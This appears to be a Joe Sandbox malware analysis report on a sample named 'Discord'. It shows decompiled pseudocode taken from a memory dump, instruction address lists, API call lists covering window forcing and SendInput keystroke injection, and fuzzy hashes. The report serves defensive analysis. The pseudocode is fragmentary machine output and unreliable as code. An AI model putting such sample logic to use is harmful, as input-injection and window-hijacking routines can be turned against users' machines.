																asm("fld1");
																asm("fxch st0, st1");
																__esi = __edi;
																asm("fucomip st0, st1");
																st0 = __fp0;
																if(__ecx >= 0) {
																	while(1) {
																		L17:
																		__ecx =  *0x6de9e814;
																		__eax = __ebx + __eax;
																		__edx = __esi + __edx;
																		 *0x6de9e894 = __eax;
																		 *0x6de9e898 = __edx;
																		__eflags =  *0x6de9e814;
																		if( *0x6de9e814 == 0) {
																			_a8 = __eax;
																			__eax =  *0x6de9e868;
																			_a24 = 1;
																			_a20 = 0;
																			_a16 = 0;
																			_a12 = __edx;
																			_a4 = 0xffffffff;
																			_v0 =  *0x6de9e868;
																			__eax = _a44();
																			__esp = __esp - 0x1c;
																		}
																		_v0 = 1;
																		__esi = __esi + __edi;
																		Sleep(??);
																		__esp = __esp - 4;
																		_a40 = _a40 + 1;
																		__ebx = __ebx + _a48;
																		__eflags = __ebx;
																		asm("fild dword [esp+0x28]");
																		__fp0 = _a32;
																		asm("fucomip st0, st1");
																		st0 = __fp0;
																		if(__ebx < 0) {
																			goto L19;
																		}
																		L16:
																		__eax = 0x6de9e87c->left;
																		__edx =  *0x6de9e880;
																	}
																}
																goto L19;
															}
														}
													} else {
														__eax = _a52;
														_v0 = _a52;
														L6DE8DD20();
														__eax = _a56;
														_v0 = _a56;
														L6DE8DD20();
														__eax =  *0x6de9e760;
														__eflags = __eax - 1;
														_a60 = __eax;
														if(__eax == 1) {
															L71:
															__eax = E6DE8A200();
															L1:
															return _a60;
														} else {
															_a60 = 1;
															__eax = _a60;
															__esp =  &(__esp[0x33]);
															_pop(__ebx);
															_pop(__esi);
															_pop(__edi);
															return _a60;
														}
													}
												}
											} else {
												__ecx =  *0x6de9e814;
												__eflags =  *0x6de9e814;
												if( *0x6de9e814 == 0) {
													__eax =  *0x6de9e868;
													_a4 = __eax;
													_v0 = __eax;
													L6DE8DC60();
													Sleep(0x64);
													__esp = __esp - 4;
													__eax = FindWindowA(0, __edi);
													__esp = __esp - 8;
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *0x6de9e868;
														_a4 = __eax;
														_v0 = __eax;
														L6DE8DC68();
													}
												}
												Sleep(0x3e8);
												__esp = __esp - 4;
												_t86 =  &_a40;
												 *_t86 = _a40 - 1;
												__eflags =  *_t86;
												if( *_t86 != 0) {
													continue;
												} else {
													goto L27;
												}
											}
										}
									}
								}
							}
							_a56 = __edi;
							goto L67;
						}
					}
				}
			}

0x6de8d550
0x6de8d550
0x6de8d550
0x6de8d552
0x6de8d552
0x6de8d555
0x6de8d558
0x6de8d55b
0x6de8d55d
0x00000000
0x00000000
0x6de8d55f
0x6de8d562
0x6de8d564
0x6de8d566
0x6de8d462
0x6de8d462
0x6de8d462
0x6de8d468
0x6de8d46e
0x6de8d46e
0x6de8d471
0x6de8d476
0x6de8d47a
0x6de8d47f
0x6de8d481
0x6de8d483
0x6de8d489
0x6de8d48b
0x6de8d491
0x6de8d493
0x6de8d79a
0x6de8d499
0x6de8d499
0x6de8d49d
0x6de8d4a0
0x6de8d4a2
0x6de8d748
0x6de8d74d
0x6de8d753
0x6de8d753
0x6de8d4a2
0x6de8d4a8
0x6de8d4a8
0x6de8d4aa
0x6de8d4b0
0x6de8d4b0
0x6de8d4b2
0x6de8d4ba
0x6de8d4bc
0x6de8d4bf
0x6de8d4c1
0x00000000
0x00000000
0x00000000
0x6de8d522
0x6de8d522
0x6de8d525
0x6de8d531
0x6de8d536
0x6de8d536
0x6de8d53e
0x6de8d540
0x6de8d543
0x6de8d546
0x6de8d548
0x00000000
0x6de8d54a
0x00000000
0x6de8d54a
0x6de8d56c
0x6de8d56c
0x6de8d56c
0x6de8d56e
0x6de8d571
0x6de8d574
0x6de8d576
0x00000000
0x6de8d578
0x6de8d578
0x6de8d578
0x6de8d57a
0x6de8d57d
0x6de8d57f
0x6de8d581
0x00000000
0x6de8d583
0x6de8d462
0x6de8d462
0x6de8d462
0x6de8d468
0x6de8d46e
0x6de8d46e
0x6de8d46e
0x6de8d471
0x6de8d476
0x6de8d47a
0x6de8d47f
0x6de8d481
0x6de8d483
0x6de8d489
0x6de8d48b
0x6de8d491
0x6de8d493
0x6de8d79a
0x6de8d499
0x6de8d499
0x6de8d49d
0x6de8d4a0
0x6de8d4a2
0x6de8d748
0x6de8d74d
0x6de8d753
0x6de8d753
0x6de8d4a2
0x6de8d4a8
0x6de8d4a8
0x6de8d4aa
0x6de8d4b0
0x6de8d4b0
0x6de8d4b2
0x6de8d4ba
0x6de8d4bc
0x6de8d4bf
0x6de8d4c1
0x00000000
0x00000000
0x6de8d4c7
0x6de8d4c7
0x00000000
0x6de8d590
0x6de8d590
0x6de8d592
0x6de8d7ab
0x6de8d7b0
0x6de8d5a0
0x6de8d5a0
0x6de8d5a0
0x6de8d5a2
0x6de8d5a7
0x6de8d5ae
0x6de8d5b3
0x6de8d5b6
0x6de8d5b8
0x6de8d5c5
0x6de8d5cb
0x6de8d5ce
0x6de8d5d3
0x6de8d5d3
0x6de8d5e7
0x6de8d5ed
0x6de8d5f0
0x6de8d5f8
0x6de8d600
0x6de8d608
0x6de8d60b
0x6de8d611
0x6de8d611
0x6de8d614
0x6de8d617
0x6de8d61a
0x6de8d62d
0x6de8d633
0x6de8d636
0x6de8d63d
0x6de8d644
0x6de8d648
0x6de8d650
0x6de8d658
0x6de8d660
0x6de8d668
0x6de8d66d
0x6de8d670
0x6de8d674
0x6de8d678
0x6de8d67d
0x6de8d681
0x6de8d689
0x6de8d68e
0x6de8d695
0x6de8d69c
0x6de8d6a0
0x6de8d6a4
0x6de8d6aa
0x6de8d6ad
0x6de8d6af
0x6de8d6b3
0x6de8d6b7
0x6de8d6bb
0x6de8d6be
0x6de8d6be
0x6de8d6c6
0x6de8d6cb
0x6de8d6cb
0x00000000
0x6de8d592
0x6de8d46e
0x6de8d462
0x6de8d581
0x6de8d576
0x6de8d4cc
0x6de8d4cc
0x6de8d4d2
0x6de8d4d4
0x6de8d4da
0x6de8d4e0
0x6de8d4f6
0x6de8d4fc
0x6de8d4fc
0x6de8cfe4
0x6de8cfe4
0x6de8cfe9
0x6de8cfed
0x6de8cff2
0x6de8cff8
0x6de8cffc
0x6de8d002
0x6de8d007
0x6de8d00d
0x6de8d013
0x6de8d015
0x6de8d015
0x6de8d018
0x6de8d020
0x6de8d022
0x6de8d024
0x6de8d028
0x6de8d02c
0x6de8d030
0x6de8d034
0x6de8d038
0x6de8d03c
0x6de8d040
0x6de8d046
0x6de8d04a
0x6de8d052
0x6de8d054
0x6de8d056
0x6de8d05a
0x6de8d05e
0x6de8d062
0x6de8d066
0x6de8d068
0x6de8d06a
0x6de8d06c
0x6de8d06e
0x6de8d070
0x6de8d0b0
0x6de8d0b0
0x6de8d0b0
0x6de8d0b6
0x6de8d0b8
0x6de8d0ba
0x6de8d0bf
0x6de8d0c5
0x6de8d0c7
0x6de8d0c9
0x6de8d0cd
0x6de8d0d2
0x6de8d0da
0x6de8d0e2
0x6de8d0ea
0x6de8d0ee
0x6de8d0f6
0x6de8d0f9
0x6de8d0fd
0x6de8d0fd
0x6de8d080
0x6de8d087
0x6de8d089
0x6de8d08b
0x6de8d08e
0x6de8d093
0x6de8d093
0x6de8d097
0x6de8d09b
0x6de8d09f
0x6de8d0a1
0x6de8d0a3
0x00000000
0x00000000
0x6de8d0a5
0x6de8d0a5
0x6de8d0aa
0x6de8d0aa
0x6de8d0b0
0x6de8d072
0x6de8d105
0x6de8d105
0x6de8d10a
0x6de8d10f
0x6de8d112
0x6de8d117
0x6de8d11d
0x6de8d121
0x6de8d125
0x6de8d125
0x6de8d12b
0x6de8d12d
0x00000000
0x00000000
0x6de8d13a
0x6de8d13c
0x6de8d13f
0x6de8d142
0x6de8d147
0x6de8d14f
0x6de8d155
0x6de8d155
0x6de8d158
0x6de8d15b
0x6de8d15e
0x6de8d163
0x6de8d167
0x6de8d169
0x6de8d16e
0x6de8d172
0x6de8d17b
0x6de8d180
0x6de8d186
0x6de8d188
0x6de8d18b
0x6de8d18d
0x6de8d2a4
0x6de8d2a4
0x6de8d2ab
0x6de8d2af
0x6de8d7a1
0x6de8d7a1
0x6de8d2b5
0x6de8d2b9
0x6de8d2bc
0x6de8d2c1
0x6de8d2c5
0x6de8d2c8
0x6de8d2cd
0x00000000
0x6de8d193
0x6de8d19e
0x6de8d1a3
0x6de8d1a5
0x00000000
0x6de8d1ab
0x6de8d1b6
0x6de8d1bb
0x6de8d1bd
0x00000000
0x6de8d1c3
0x6de8d1c3
0x6de8d1ce
0x6de8d1d3
0x6de8d1d5
0x6de8d1f8
0x6de8d1f8
0x6de8d1fd
0x6de8d201
0x6de8d203
0x6de8d701
0x6de8d701
0x6de8d705
0x6de8d708
0x6de8d70d
0x6de8d711
0x6de8d714
0x6de8d719
0x00000000
0x6de8d209
0x6de8d209
0x6de8d209
0x6de8d209
0x6de8d20e
0x6de8ccdb
0x6de8ccdd
0x6de8cce1
0x6de8cce8
0x6de8ccf0
0x6de8ccf4
0x6de8ccf8
0x6de8ccfc
0x6de8cd00
0x6de8cd04
0x6de8cd08
0x6de8cd0c
0x6de8cd18
0x6de8cd1a
0x6de8cd20
0x6de8cd23
0x6de8cd25
0x6de8d761
0x6de8d761
0x6de8d765
0x6de8d768
0x6de8d76d
0x6de8d771
0x6de8d774
0x6de8d779
0x6de8d780
0x6de8d78a
0x00000000
0x00000000
0x00000000
0x6de8cd2b
0x6de8cd2b
0x6de8cd2f
0x6de8cd31
0x00000000
0x6de8cd37
0x6de8cd37
0x6de8cd3b
0x6de8cd3e
0x6de8cd43
0x6de8cd4b
0x6de8cd51
0x6de8cd51
0x6de8cd54
0x6de8cd57
0x6de8cd5a
0x6de8cd5f
0x6de8cd63
0x6de8cd67
0x6de8cd6c
0x6de8cd70
0x6de8cd79
0x6de8cd7e
0x6de8cd81
0x6de8cd84
0x6de8cd90
0x6de8cd92
0x6de8cd97
0x6de8cd9a
0x6de8cd9d
0x6de8cda2
0x6de8cda8
0x6de8cdaa
0x6de8d514
0x6de8d51a
0x6de8d51a
0x6de8cdb0
0x6de8cdb4
0x6de8cdb8
0x6de8cdbd
0x6de8cdc4
0x6de8cdca
0x6de8cdcf
0x6de8cdd5
0x6de8cddb
0x6de8cde1
0x6de8cde7
0x6de8cde9
0x6de8cdeb
0x6de8cdef
0x6de8cdf3
0x6de8cdfb
0x6de8cdff
0x6de8ce05
0x6de8ce0b
0x6de8ce11
0x6de8ce13
0x6de8ce15
0x6de8ce19
0x6de8ce1d
0x6de8ce21
0x6de8ce25
0x6de8ce27
0x6de8ce2a
0x6de8ce2c
0x6de8ce30
0x6de8ce32
0x6de8ce34
0x6de8ced8
0x6de8cedd
0x6de8ce3a
0x6de8ce3a
0x6de8ce3f
0x6de8ce41
0x6de8ce45
0x6de8ce4d
0x6de8ce78
0x6de8ce78
0x6de8ce7d
0x6de8ce83
0x6de8ce89
0x6de8ce8b
0x6de8ce8d
0x6de8ce8f
0x6de8ce94
0x6de8ce9a
0x6de8ce9c
0x6de8cea0
0x6de8cea5
0x6de8cead
0x6de8ceb5
0x6de8cebd
0x6de8cec1
0x6de8cec9
0x6de8cecc
0x6de8ced0
0x6de8ced0
0x6de8ce53
0x6de8ce5a
0x6de8ce5c
0x6de8ce5e
0x6de8ce61
0x6de8ce66
0x6de8ce66
0x6de8ce6a
0x6de8ce6e
0x6de8ce72
0x6de8ce74
0x6de8ce74
0x6de8ce78
0x6de8cee1
0x6de8cee5
0x6de8cee9
0x6de8ceee
0x6de8cef6
0x6de8cefe
0x6de8cf02
0x6de8cf0a
0x6de8cf14
0x6de8cf19
0x6de8cf1f
0x6de8cf25
0x6de8cf29
0x6de8cf2d
0x6de8cf31
0x6de8cf35
0x6de8cf39
0x6de8cf3e
0x6de8cf42
0x6de8cf47
0x6de8cf4b
0x6de8cf4e
0x6de8cf54
0x6de8cf5a
0x6de8cf5e
0x6de8cf62
0x6de8cf66
0x6de8cf6a
0x6de8cf70
0x6de8cf78
0x6de8cf7d
0x6de8cf80
0x6de8cf86
0x6de8cf8e
0x6de8cf95
0x6de8cf9a
0x6de8cf9f
0x6de8cfa4
0x6de8cfa6
0x6de8cfb0
0x6de8cfb2
0x6de8cfb7
0x6de8cfba
0x6de8cfbd
0x6de8cfc2
0x6de8cfc8
0x6de8cfca
0x6de8d2e7
0x6de8d2e9
0x6de8d2ec
0x6de8d319
0x6de8d31b
0x6de8d325
0x6de8d327
0x6de8d351
0x6de8d353
0x6de8d35d
0x6de8d35f
0x6de8d389
0x6de8d38b
0x6de8d395
0x6de8d397
0x6de8d3c1
0x6de8d3c3
0x6de8d3c6
0x6de8d3d2
0x6de8d3d4
0x6de8d3d7
0x6de8d3e6
0x6de8d3e8
0x6de8d409
0x6de8d409
0x6de8d40f
0x6de8d411
0x00000000
0x00000000
0x6de8d3f0
0x6de8d3ff
0x6de8d401
0x6de8d404
0x6de8d404
0x6de8d407
0x00000000
0x00000000
0x00000000
0x6de8d407
0x6de8d413
0x6de8d419
0x6de8d41f
0x6de8d421
0x6de8d75a
0x6de8d427
0x6de8d427
0x6de8d429
0x6de8d42e
0x6de8d430
0x6de8d434
0x6de8d437
0x6de8d43a
0x6de8d43d
0x6de8d43f
0x6de8d441
0x6de8d443
0x6de8d448
0x6de8d44b
0x00000000
0x6de8d451
0x6de8d451
0x6de8d45d
0x6de8d45d
0x00000000
0x6de8d44b
0x00000000
0x6de8cfd0
0x6de8cfd0
0x6de8cfd5
0x6de8cfda
0x6de8cfdf
0x6de8cfdf
0x6de8cfe4
0x6de8cfe9
0x6de8cfed
0x6de8cff2
0x6de8cff8
0x6de8cffc
0x6de8d002
0x6de8d007
0x6de8d00d
0x6de8d013
0x6de8d015
0x6de8d015
0x6de8d018
0x6de8d020
0x6de8d022
0x6de8d024
0x6de8d028
0x6de8d02c
0x6de8d030
0x6de8d034
0x6de8d038
0x6de8d03c
0x6de8d040
0x6de8d046
0x6de8d04a
0x6de8d052
0x6de8d054
0x6de8d056
0x6de8d05a
0x6de8d05e
0x6de8d062
0x6de8d066
0x6de8d068
0x6de8d06a
0x6de8d06c
0x6de8d06e
0x6de8d070
0x6de8d0b0
0x6de8d0b0
0x6de8d0b0
0x6de8d0b6
0x6de8d0b8
0x6de8d0ba
0x6de8d0bf
0x6de8d0c5
0x6de8d0c7
0x6de8d0c9
0x6de8d0cd
0x6de8d0d2
0x6de8d0da
0x6de8d0e2
0x6de8d0ea
0x6de8d0ee
0x6de8d0f6
0x6de8d0f9
0x6de8d0fd
0x6de8d0fd
0x6de8d080
0x6de8d087
0x6de8d089
0x6de8d08b
0x6de8d08e
0x6de8d093
0x6de8d093
0x6de8d097
0x6de8d09b
0x6de8d09f
0x6de8d0a1
0x6de8d0a3
0x00000000
0x00000000
0x6de8d0a5
0x6de8d0a5
0x6de8d0aa
0x6de8d0aa
0x6de8d0b0
0x00000000
0x6de8d070
0x6de8cd31
0x6de8d214
0x6de8d214
0x6de8d218
0x6de8d21b
0x6de8d220
0x6de8d224
0x6de8d227
0x6de8d22c
0x6de8d231
0x6de8d234
0x6de8d238
0x6de8d790
0x6de8d790
0x6de8cb9c
0x6de8cbaa
0x6de8d23e
0x6de8d23e
0x6de8d246
0x6de8d24a
0x6de8d250
0x6de8d251
0x6de8d252
0x6de8d254
0x6de8d254
0x6de8d238
0x6de8d20e
0x6de8d1d7
0x6de8d1d7
0x6de8d1dd
0x6de8d1df
0x6de8d255
0x6de8d25a
0x6de8d25e
0x6de8d261
0x6de8d26d
0x6de8d26f
0x6de8d27d
0x6de8d283
0x6de8d286
0x6de8d288
0x6de8d28e
0x6de8d293
0x6de8d297
0x6de8d29a
0x6de8d29a
0x6de8d288
0x6de8d1e8
0x6de8d1ea
0x6de8d1ed
0x6de8d1ed
0x6de8d1ed
0x6de8d1f2
0x00000000
0x00000000
0x00000000
0x00000000
0x6de8d1f2
0x6de8d1d5
0x6de8d1bd
0x6de8d1a5
0x6de8d18d
0x6de8d6fd
0x00000000
0x6de8d6fd
0x6de8cfe4
0x6de8d552

APIs

_Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE8D112
_ZSt8__uniqueIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops19_Iter_equal_to_iterEET_SB_SB_T0_.DPUB1 ref: 6DE8D47A
GetWindowRect.USER32 ref: 6DE8D4F6

Strings

|m, xrefs: 6DE8D4EB

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Window$ForceForegroundIter_equal_to_iterN9__gnu_cxx17__normal_iteratorRectS0_5__ops19_St6vectorSt8__unique
String ID: |m
API String ID: 3321284737-1250477342
Opcode ID: c6a9152bd16a9afda760c85a82c8ad7f784d0a5a1085e85797e585111a5fdda3
Instruction ID: 8c6e91db92951fc5c058406fa45585c6551b157316a84d12aa5c4b1174f5300f
Opcode Fuzzy Hash: c6a9152bd16a9afda760c85a82c8ad7f784d0a5a1085e85797e585111a5fdda3
Instruction Fuzzy Hash: 50714B74A0A7019FDB009F69C18461ABBF0FBC5B58F65892EE998DB311EB31D841CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE85670 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32 ref: 6DE8567B
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE856B6
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE856DC
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE8570C
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85732
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85762
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85788
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE857A4
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE857C0
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE857DC
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE8582A
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE85846
_ZNSs6assignEPKcj.LIBSTDC++-6 ref: 6DE858FD
_ZdlPv.LIBSTDC++-6 ref: 6DE8596F

Strings

`m, xrefs: 6DE856BE
pm, xrefs: 6DE85714

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Ss6assign$EventReset
String ID: `m$pm
API String ID: 533176646-2149999674
Opcode ID: 39564784519e9ed04616457ab31d217f80f62887391a0756dec7ff22838a9bde
Instruction ID: 886a284a8f1d398a261e3c1b5ced571b0298d0581f22f40252faab7525e23bbe
Opcode Fuzzy Hash: 39564784519e9ed04616457ab31d217f80f62887391a0756dec7ff22838a9bde
Instruction Fuzzy Hash: 0A61C8F0407B409EEB00AF64C55A31A7EF0FB42B08F95491ED6849F396DBBA4448CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6DE823E0 Relevance: 27.2, APIs: 18, Instructions: 176keyboardsleepCOMMON

Download Yara Rule

APIs

GdipDisposeImage.GDIPLUS ref: 6DE8240E
GdipFree.GDIPLUS ref: 6DE82419
_Z6Decre1P6HWND__ii.DFO1 ref: 6DE8245D
Sleep.KERNEL32 ref: 6DE82474
Sleep.KERNEL32 ref: 6DE8248D
GdipDisposeImage.GDIPLUS ref: 6DE824B8
GdipFree.GDIPLUS ref: 6DE824C3
_Z6Decre1P6HWND__ii.DFO1 ref: 6DE82507
MapVirtualKeyA.USER32 ref: 6DE8254A
MapVirtualKeyA.USER32 ref: 6DE8257D
MapVirtualKeyA.USER32 ref: 6DE825B0
MapVirtualKeyA.USER32 ref: 6DE825DE
SendInput.USER32 ref: 6DE82607

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: GdipVirtual$D__iiDecre1DisposeFreeImageSleep$InputSend
String ID:
API String ID: 3784013309-0
Opcode ID: 230228e85781d2a10a0427faee168cfa1ba8ea253ae2bd8dade282df8a04db15
Instruction ID: c60b2efe3c4cb78539bb502ef352b286e338f12c272f382296c44673e28a4b91
Opcode Fuzzy Hash: 230228e85781d2a10a0427faee168cfa1ba8ea253ae2bd8dade282df8a04db15
Instruction Fuzzy Hash: 9A8122B0009741CFE710AF65C58835EBBF0BF85708F00882DE9D89B295E7BA8848CB53

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8C170 Relevance: 22.7, APIs: 15, Instructions: 176COMMON

Download Yara Rule

APIs

_ZSt16__insertion_sortIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops15_Iter_less_iterEEvT_SB_T0_.DPUB1 ref: 6DE8C1CB
_ZSt8__uniqueIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops19_Iter_equal_to_iterEET_SB_SB_T0_.DPUB1 ref: 6DE8C1E8
_ZSt16__insertion_sortIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops15_Iter_less_iterEEvT_SB_T0_.DPUB1 ref: 6DE8C34C

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: N9__gnu_cxx17__normal_iteratorSt6vector$Iter_less_iterS0_5__ops15_St16__insertion_sort$Iter_equal_to_iterS0_5__ops19_St8__unique
String ID:
API String ID: 2165189849-0
Opcode ID: b028f60c88f3eada44293f8235b905d189b9bee72813bec1f14b9986421fc18c
Instruction ID: 687e6998807b51eb1b9e2da290145ad9fbb3d376a711f85b96d3bf55e8491802
Opcode Fuzzy Hash: b028f60c88f3eada44293f8235b905d189b9bee72813bec1f14b9986421fc18c
Instruction Fuzzy Hash: A5617F70B0A7029FD711DF69D58422EBBF1BB86758F25852EEA9CDB341DB3098418B42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8AA00 Relevance: 22.6, APIs: 15, Instructions: 114sleepwindowCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32 ref: 6DE8AA49
Sleep.KERNEL32 ref: 6DE8AA5F
_Z4StCuii.DFO1 ref: 6DE8AA75
Sleep.KERNEL32 ref: 6DE8AA81
SetEvent.KERNEL32 ref: 6DE8AA8E
Sleep.KERNEL32 ref: 6DE8AA9E
_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE8AAAF
GetWindowLongA.USER32 ref: 6DE8AACF
SetWindowLongA.USER32 ref: 6DE8AAF6
SetLayeredWindowAttributes.USER32 ref: 6DE8AB42
ShowWindow.USER32 ref: 6DE8AB5B
_Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE8AB6C
Sleep.KERNEL32 ref: 6DE8AB78
IsWindowVisible.USER32 ref: 6DE8AB85

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Window$Sleep$EventLong$AttributesCuiiForceForegroundLayeredResetShowSs7compareVisible
String ID:
API String ID: 2485865035-0
Opcode ID: 47eef9f876f6b5102356d13cf3a5b8ec716e9827b426bf6bfd3cff4735725fbe
Instruction ID: 3fd230f45f4d2d22017e82f1f770d8eb162331325ed2a96a03d64aa0a42f8f4f
Opcode Fuzzy Hash: 47eef9f876f6b5102356d13cf3a5b8ec716e9827b426bf6bfd3cff4735725fbe
Instruction Fuzzy Hash: 714121B090A7018FEB10AFB9D54871E7BF0FB46708F05452EE999DB244EB749498CB53

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8BFEB Relevance: 22.6, APIs: 15, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DE8BFEB() {
				intOrPtr _t31;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				_t46 = _t31;
				_t63 = _t64 - 0xf4;
				while(1) {
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x158)));
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x160)) - 0xc);
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x168)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x16c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x170)));
					_t39 =  *((intOrPtr*)(_t64 - 0x174));
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t39);
					 *_t65 = _t46;
					L6DE8EBA0();
					_t46 = _t39;
					_t63 = _t64 - 0xf4;
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t61);
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x144)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x148)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x14c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x150)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x154)));
				}
			}

0x6de8bfeb
0x6de8bfed
